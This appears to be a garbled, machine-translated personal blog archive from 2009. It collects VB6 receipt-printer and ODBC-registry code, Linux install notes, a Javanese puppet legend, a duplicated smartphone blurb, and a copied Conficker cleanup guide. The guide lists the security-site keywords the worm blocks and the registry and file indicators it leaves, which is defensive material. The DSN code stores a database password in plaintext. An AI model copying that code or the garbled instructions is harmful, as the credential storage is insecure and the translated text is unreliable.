sWrittenData = sWrittenData + "------------------------------------------------" + vbCrLf
sWrittenData = sWrittenData + "Total" + Chr(&H6) + "" + Chr(&H9) + Chr(&H1B) + Chr(&H69) + Chr(&H1) + Chr(&H1) + " $156.95" + vbCrLf 'Character Expansion - Pg. 3-10
sWrittenData = sWrittenData + Chr(&H1B) + Chr(&H69) + Chr(&H0) + Chr(&H0) 'Cancel Character Expansion - Pg. 3-10
sWrittenData = sWrittenData + "------------------------------------------------" + vbCrLf + vbCrLf
sWrittenData = sWrittenData + "Charge" + vbCrLf + "$159.95" + vbCrLf
sWrittenData = sWrittenData + "Visa XXXX-XXXX-XXXX-0123" + vbCrLf + vbCrLf
sWrittenData = sWrittenData + Chr(&H1B) + Chr(&H34) + "Refunds and Exchanges" + Chr(&H1B) + Chr(&H35) + vbNewLine 'Specify/Cencel White/Black Invert - Pg. 3-16
sWrittenData = sWrittenData + "Within " + Chr(&H1B) + Chr(&H2D) + Chr(&H1) + "30 days" + Chr(&H1B) + Chr(&H2D) + Chr(&H0) + " with receipt" + vbCrLf 'Specify/Cancel Underline Printing - Pg. 3-15
sWrittenData = sWrittenData + "And tags attached" + vbCrLf + vbCrLf
sWrittenData = sWrittenData + Chr(&H1B) + Chr(&H1D) + Chr(&H61) + Chr(&H1)
sWrittenData = sWrittenData + Chr(&H1B) + Chr(&H62) + Chr(&H6) + Chr(&H2) + Chr(&H2) + " 12ab34cd56" + Chr(&H1E) + vbCrLf 'Barcode - Pg. 3-39 - 3-40
sWrittenData = sWrittenData + Chr(&H1B) + Chr(&H64) + Chr(&O2) 'Cut - Pg. 3-41
sWrittenData = sWrittenData + Chr(&H7)

-------------------------------------------------------------------------------------
confused to the source code this would be used for what,
buanyak code for the dot matrix printer
for the comment love ya can, make the knowledge sharing ya. stay informed newbie copas blink...

Senin, 01 Juni 2009

printed strukwith star tipe cutter printer sesi 1

Hisyam Wahid Luthfi...hear more news abaut printer..
Yesterday I try to create a program using the printer serial star, but I forgot similar in market type that can have direct cutternya and breadth only about 6-8 cm. use paper scroll. Previously I had prosting how to stop that paper does not curl up and hold. but I was not able to set the size of the letters. after browsing here and there, stop in to the site www.vb-bego.net in regards forum in the study but eventually also have to use ocx in seller and were forced to do a search search-reference the other. after a while I finally found how to make a bold writings. and I join with the source does not roll up to hold. please continue .

I immediately gave source code.........

---------------------------------------------------------------------------------------

Open "Lpt1" For Output As #1

Print #1, Chr(27) & "@" 'mendekeksi printer
Print #1, Chr(27) & "A" & Chr(11)
Print #1, Chr(27) & "E" 'Membuat Tebal
Print #1, "Mencetak dengan ukuran 2 kali biasa"
Print #1, "Mencetak dengan ukuran 2 kali biasa"
Print #1, Chr(27) & "F" ' membuat normal kembali

Print #1, "Mencetak yang normal-normal saja"
Print #1, "Mencetak yang normal-normal saja"

Close #1

--------------------------------------------------------------------------------------
printer to print directly in accordance with the command and will stop its own.
source code of this I can www.pscode.com. Thank you for that make.

be useful.

chung chin

Make DSN for data base My SQL

I created this post because at the time I made a difficult project, how to call a mySQL database in place so that the report can use the report's database. but at the time of a DSN on the computer immediately after I remove our project on another computer then not allowed DSN also participate so that report can not we call the database.
DSN can be created by itself. after gogling and disassemble the source code so that I have to get the source create DSN with the API function.
This time I will share the source code that I have made.

first create a first module that contains functions to write to registry
please in sourcenya ni copas paste All...

-------------------------------------------------------------------------------------

Public Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
Public Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Public Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Public Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long ' Note that if you declare the lpData parameter as String, you must pass it By Value.
Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Public Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long ' Note that if you declare the lpData parameter as String, you must pass it By Value.
Public Declare Function RegSetValue Lib "advapi32.dll" Alias "RegSetValueA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Enum REG
HKEY_CURRENT_USER = &H80000001
HKEY_CLASSES_ROOT = &H80000000
HKEY_CURRENT_CONFIG = &H80000005
HKEY_LOCAL_MACHINE = &H80000002
HKEY_USERS = &H80000003
End Enum
Public Const READ_CONTROL = &H20000
Public Const KEY_QUERY_VALUE = &H1
Public Const KEY_SET_VALUE = &H2
Public Const KEY_CREATE_SUB_KEY = &H4
Public Const KEY_ENUMERATE_SUB_KEYS = &H8
Public Const KEY_NOTIFY = &H10
Public Const KEY_CREATE_LINK = &H20

'Tipe Reg Key ROOT ...
Public Const ERROR_SUCCESS = 0
Public dsnDriver As String
Enum TypeStringValue
REG_SZ = 1
REG_EXPAND_SZ = 2
REG_MULTI_SZ = 7
End Enum
Enum TypeBase
TypeHexadecimal
TypeDecimal
End Enum
Public Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type
Public Declare Function CreateDirectory Lib "kernel32" Alias "CreateDirectoryA" (ByVal lpPathName As String, lpSecurityAttributes As SECURITY_ATTRIBUTES) As Long
Public Declare Function NdamelAnak Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long

Public Keamanan As SECURITY_ATTRIBUTES
Public Sub GaweAnakManeh(Ibu As String, Anak As String)
NdamelAnak Ibu, Anak, 0
End Sub
Public Function NdamelTulisan(hKey As REG, Subkey As String, RTypeStringValue As TypeStringValue, strValueName As String, strData As String) As Long

On Error Resume Next
Dim ret As Long

RegCreateKey hKey, Subkey, ret
NdamelTulisan = RegSetValueEx(ret, strValueName, 0, RTypeStringValue, ByVal strData, Len(strData))
RegCloseKey ret

End Function
Public Sub GaweDSN(dsnName As String, dsnServer As String, dsnPort As String, dsnUser As String, dsnPass As String)
If Not cekDrivermySQL(dsnDriver) Then
MsgBox "Tidak ada driver mySQL silahkan di install dulu", vbOKOnly + vbCritical, "Error.!!"
MsgBox "Program sementara di tutup", vbOKOnly + vbCritical, "Error.!!"
End
End If
NdamelTulisan HKEY_LOCAL_MACHINE, "SOFTWARE\ODBC\ODBC.INI\" & dsnName, REG_SZ, "Description", "MySQL for Education"
NdamelTulisan HKEY_LOCAL_MACHINE, "SOFTWARE\ODBC\ODBC.INI\" & dsnName, REG_SZ, "Database", dsnName
NdamelTulisan HKEY_LOCAL_MACHINE, "SOFTWARE\ODBC\ODBC.INI\" & dsnName, REG_SZ, "Server", dsnServer
NdamelTulisan HKEY_LOCAL_MACHINE, "SOFTWARE\ODBC\ODBC.INI\" & dsnName, REG_SZ, "Port", dsnPort
NdamelTulisan HKEY_LOCAL_MACHINE, "SOFTWARE\ODBC\ODBC.INI\" & dsnName, REG_SZ, "User", dsnUser
NdamelTulisan HKEY_LOCAL_MACHINE, "SOFTWARE\ODBC\ODBC.INI\" & dsnName, REG_SZ, "Password", dsnPass
NdamelTulisan HKEY_LOCAL_MACHINE, "SOFTWARE\ODBC\ODBC.INI\" & dsnName, REG_SZ, "Server", dsnServer
NdamelTulisan HKEY_LOCAL_MACHINE, "SOFTWARE\ODBC\ODBC.INI\" & dsnName, REG_SZ, "Driver", dsnDriver
NdamelTulisan HKEY_LOCAL_MACHINE, "SOFTWARE\ODBC\ODBC.INI\" & dsnName, REG_SZ, "Stmt", ""
NdamelTulisan HKEY_LOCAL_MACHINE, "SOFTWARE\ODBC\ODBC.INI\" & dsnName, REG_SZ, "Option", ""
NdamelTulisan HKEY_LOCAL_MACHINE, "SOFTWARE\ODBC\ODBC.INI\ODBC Data Sources", REG_SZ, dsnName, "MySQL ODBC 3.51 Driver"
End Sub
Public Function AdaDriver(RegKeyPath As String, _
RegKeyName As String, _
ByRef RegKeyValue As String) As Boolean
Dim DoesIt As Boolean
Dim Result As Long
Dim hKey As Long
Result = RegOpenKeyEx(HKEY_LOCAL_MACHINE, RegKeyPath, 0&, KEY_QUERY_VALUE, hKey)
If Result <> ERROR_SUCCESS Then
AdaDriver = False
Exit Function
End If
Result = RegQueryValueEx(hKey, RegKeyName, 0&, REG_SZ, ByVal RegKeyValue, Len(RegKeyValue))
RegCloseKey (hKey)


If Result <> ERROR_SUCCESS Then
AdaDriver = False
Exit Function
End If
AdaDriver = True
End Function


Public Function cekDrivermySQL(ByRef dsnDriver As String) As Boolean
Dim RegKeyPath As String
Dim RegKeyName As String
Dim RegKeyValue As String
Dim DoesIt As Boolean


DoesIt = False
'edit here to change the driver information
RegKeyPath = "SOFTWARE\ODBC\ODBCINST.INI\MySQL ODBC 3.51 Driver"
RegKeyName = "Driver"
RegKeyValue = String(255, Chr(32))



If AdaDriver(RegKeyPath, RegKeyName, RegKeyValue) Then
dsnDriver = RegKeyValue
DoesIt = True
Else
DoesIt = False
End If

cekDrivermySQL = DoesIt
End Function
let's out source with google


chung_chin

Selasa, 26 Mei 2009

Install Ubuntu 9.40 di NOtebox BYON M31w

nunggu after I finally finished the download ubuntu 9:04 after I try on the laptop BYON M31W must also insert the acpi = off noapic nolapic. and does not support VGA SIS, finally I try to continue to install, after that ga usah edit grub because it is also automatically written acpi = off, noapic, nolapic. Wireless is also in addition to directly detect ga have to wear ndiwswrapper. the results of a review ubuntu.9.04 installed in laptop byon m31w.
semoga aja useful.

Install Puppy Linux di Anoa 212 ZiReX



Yesterday I ordered to fix the laptop brand Anoa 212 Zyrex berhardisk that only 2 GB, no CDRoom, DVD. add even more confusion in it I have windows and the screen turns blue. I try to install windows XP SP1 after the install copy the file and restart lasi blue screen appeared again. I try several more times in fact the same. I try to use live cd windows was also the same bluescreen. so I decided to install linux. I try to use ubuntu 9:04 version livecdnya was run successfully (no blue screennya ga) eh I try to install that HD ga enough. dizziness dehhhhh
after browsing I n search of a small linux, but it looks good I nemuin the Puppy Linux and I try to download the latest version of the more than 100 MB.
after that I burn on cd and I was trying to run successfully, so the question of how to enter the HD laptopnya. I try several times may be up to 10 x more, because for 2 days I try to hold night 1 hour ga work, I browse in the search leader Google also masuh ga bisa2. I then try and touch utak successfully .....
I would like to do:
gini ....

Jump aja ya
1. format HDnya use GParted (click start -> system - GParted)
2. format with ext2 (he said with a puppy not yet know ext3)
3. then click appply wait a few minutes
4. then right click on the area of HD and click manage flags
5. then select the boot
6. wait then close the program GParted
7. click start -> setup -> remastering cdlive
8. follow the next steps to space
9. click start -> setup -> install universal ..
10. follow the steps ....
11. cd to come out installnya
12. and then restart ....
13. If the store click aja store
14. wait some time because usually a little older
15. deh selasai you can enjoy the puppy linux

sure you ask kog can use to install the ga no cd cd. you can use external CD or create your podići with FD.

sorry if there are errors in the case of informed newbie linux.

semoga aja useful

Chung Chin

Minggu, 24 Mei 2009

The Puppet


Semar (Batara Ismaya)
Semar (Betara Ismaya) was a god, brother Betara Manikmaya (Teacher) children Sang Hyang Tunggal. Sang Hyang Tunggal assume Semar is predicted that the old and will not be able to mingle with the gods. Then di titahkan live in this world to educate the descendants of gods-gods of men. After living in the Semar Marcapada (world) berubahlah elegance parasnya become a very ugly person. All signs of evil in the human body are on the Semar, Semar to spot as a regular course. Semar ago the descendants of gods and keep the bloody Pandawa.
Semar is a patient, loving pity, never hard. But at the time of anger, no one can prevent it. Deities also deems under their feet. Marks the anger, of tears streaming eyes, snot flows with swift, and the wind out unrelenting, squall to the god appears to have re splendor.
Semar always humbled in children with language asuhannya and soft as a slave on the master. But if you mingle with the gods he behave as a friend .
Semar is the wife Dewi Kanastren, have ten children and all gods. Semar as a symbol of people who like to know the human psychosis real. By the Javanese and is often referred to as the Pamomong. (disadur from Sedjarah Wajang Purwa, R. Hardjowirogo, Balai Pustaka Jakarta 1952)

Rabu, 20 Mei 2009

Sectéra® Edge™ Smartphone

Secure Mobile Environment Portable Electronic Device

Overview
The Sectéra® Edge™ smartphone converges secure wireless
voice and data by combining the functionality of a wireless
phone and PDA — all in one easy-to-use handheld device.
Developed for the National Security Agency’s Secure Mobile
Environment Portable Electronic Device (SME PED) program,
the Sectéra Edge is certified to protect wireless voice
communications classified Top Secret and below as well as
access e-mail and websites classified Secret and below.
Secure Wireless Phone and PDA
Not only can you use the Sectéra Edge to make secure
phone calls, you also have secure access to classified networks,
your e-mail and web browsing via high-speed GSM
or CDMA cellular networks worldwide.
From the palm of your hand, the Sectéra
Edge allows you to stay connected with
attachment viewers and a personal organizer
that includes contacts, calendar, tasks, alarms
and notes, with desktop synchronization.
Implementing both Type 1 and Non-Type 1 encryption,
including Suite B algorithms, the Sectéra Edge provides
maximum flexibility in secure communications.
First Rugged Secure Smartphone
Compact and lightweight, the Sectéra Edge accommodates
wear and tear from both office users securing day-to-day
communications to warfighters completing
a tactical mission.
The Sectéra Edge is designed to MIL-STD-
810F specifications for Drop, Shock, Vibration,
Operating and Storage Temperature,
Temperature Shock, Water Resistance,
Dust, Humidity and Altitude.
Secure Interoperability
The Sectéra Edge implements Secure Communications
Interoperability Protocol (SCIP), allowing secure phone calls
to be made with existing SCIP compatible devices. It also
implements High Assurance Internet Protocol Encryptor
Interoperability Specification (HAIPE® IS) to provide
secure connectivity with classified networks (including the
TACLANE® family of network encryptors).
Availability
The Sectéra Edge is NSA-certified and shipping.

Sectéra® Edge™ Smartphone

Secure Mobile Environment Portable Electronic Device

Overview
The Sectéra® Edge™ smartphone converges secure wireless
voice and data by combining the functionality of a wireless
phone and PDA — all in one easy-to-use handheld device.
Developed for the National Security Agency’s Secure Mobile
Environment Portable Electronic Device (SME PED) program,
the Sectéra Edge is certified to protect wireless voice
communications classified Top Secret and below as well as
access e-mail and websites classified Secret and below.
Secure Wireless Phone and PDA
Not only can you use the Sectéra Edge to make secure
phone calls, you also have secure access to classified networks,
your e-mail and web browsing via high-speed GSM
or CDMA cellular networks worldwide.
From the palm of your hand, the Sectéra
Edge allows you to stay connected with
attachment viewers and a personal organizer
that includes contacts, calendar, tasks, alarms
and notes, with desktop synchronization.
Implementing both Type 1 and Non-Type 1 encryption,
including Suite B algorithms, the Sectéra Edge provides
maximum flexibility in secure communications.
First Rugged Secure Smartphone
Compact and lightweight, the Sectéra Edge accommodates
wear and tear from both office users securing day-to-day
communications to warfighters completing
a tactical mission.
The Sectéra Edge is designed to MIL-STD-
810F specifications for Drop, Shock, Vibration,
Operating and Storage Temperature,
Temperature Shock, Water Resistance,
Dust, Humidity and Altitude.
Secure Interoperability
The Sectéra Edge implements Secure Communications
Interoperability Protocol (SCIP), allowing secure phone calls
to be made with existing SCIP compatible devices. It also
implements High Assurance Internet Protocol Encryptor
Interoperability Specification (HAIPE® IS) to provide
secure connectivity with classified networks (including the
TACLANE® family of network encryptors).
Availability
The Sectéra Edge is NSA-certified and shipping.

Kamis, 14 Mei 2009

refresh after test in STIMIK AKI

Just for remember .... after finishing our test in STIMIK AKI , before I speak abaut this expirience ,may be it's expirience for our Team ,

Rabu, 29 April 2009

Detection and Cleaning Conficker / Recycler / Kido

Virus Conficker / Recycler / Kido this (hereinafter Conficker virus) is a virus that has spread to more than 10 million computers in the world. In Indonesia was estimated to have tens of thousands of computers infected with this virus. Very sophisticated distribution via the Internet, network, and the Autorun USB Flashdisk. This virus also take advantage of a bug in Microsoft Windows to infecting for most of the corporate network. Microsoft censure of this virus, and even Microsoft promised to provide $ 250,000 (Rp3 billion) to anyone who can catch the making of virus.

Maybe other sites already in very many ways the analysis and cleaning this virus Conficker for example vaksin, Kaspersky, Microsoft, and thousands of sites / other blogs. But almost all provide a solution that is not so clear and even the most technical things that confuse the user beginners. As a result, many users and beginners who are still confused ask how this virus cleaning. This paper aims to discuss only the easy way to detect and clean this virus Conficker.

Detecting whether your computer is infected with the virus Conficker?

1. Can not access the site security
Your computer is likely infected if your computer can not access sites such as microsoft.com, kaspersky.com, or other sites associated with the following words:
nai, ca, AVP, avg, vet, bit9, sans, cert, windowsupdate, wilderssecurity, threatexpert, castlecops, spamhaus, cpsecure, arcabit, emsisoft, sunbelt, securecomputing, rising, prevx, pctools, norman, k7computing, ikarus, hauri, hacksoft, gdata, fortinet, ewido, clamav, comodo, quickheal, avira, avast, esafe, ahnlab, centralcommand, drweb, grisoft, eset, NOD32, F-Prot, jotti, Kaspersky, f-secure, computerassociates, networkassociates, etrust, panda, Sophos, trendmicro, McAfee, norton, Symantec, Microsoft, defender, rootkit, malware, spyware, virus

2. Hidden files can not be displayed
You can not show hidden files in the computer even though the settings have changed "show hidden" in the folder options or in Smadav.

During the scanning using Smadav, Smadav akan detect 1 registry value of the damaged caused by a virus conficker:
HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Explorer \ Advanced \ Folder \ Hidden \ SHOWALL

3. Smart-display Smadav Protection Alert
Smart-Protection (SmaRTP) Smadav display when the Alert Flashdisk dicolok to the infected computer. There are 2 files are detected, the address files detected akan shaped like this:
[x]: \ autorun.inf
[x]: \ RECYCLER \ S-5-3-42-2819952290-8240758988-879315005-3665 \ jwgkvsq.vmx

* [x] is a flash drive such as F, G, or H

You have been infected with a computer connected Smadav before, definitely will not be infected with this virus Conficker because SmaRTP will directly detect and remove them as soon as the USB Flashdisk connected.

Cleaning Conficker quite easy just by using the tools already made some anti-virus. In fact almost all Antivirus Import can clean the virus, provided that in the update. I suggest here 2 special tools to clean Conficker, namely PCMAV Express Conficker or Kidokiller Kaspersky.

1. Use one of PCMAV Express Conficker or Kidokiller Kaspersky.

Download PCMAV Express Conficker
how to use the open on this page: pcmav-express-for-conficker

Download Kaspersky Kidokiller
how to use the open on this page: Kidokiller Kaspersky


2. Windows Update Patch
Fixed bug to Microsoft and to prevent re-infection Conficker, Please Patch Windows Update page on Microsoft: MS08-067


3. Place SmaRTP Smadav
Already said before, You have been infected with a computer connected Smadav before, definitely will not be infected with this virus because Conficker akan SmaRTP directly detect and remove them as soon as the USB Flashdisk connected. So, good for the computers that were infected or not Conficker, attach Smadav in the computer so that it's safe infection.


For bloggers / other sites are expected to publish this article to help users who infected Conficker.
From Nafarin blog
And copied by hisyam from kaynere.hisyam will be stand alone and leave more .....

Link Wich Make ME feell Better

try from zero to grow up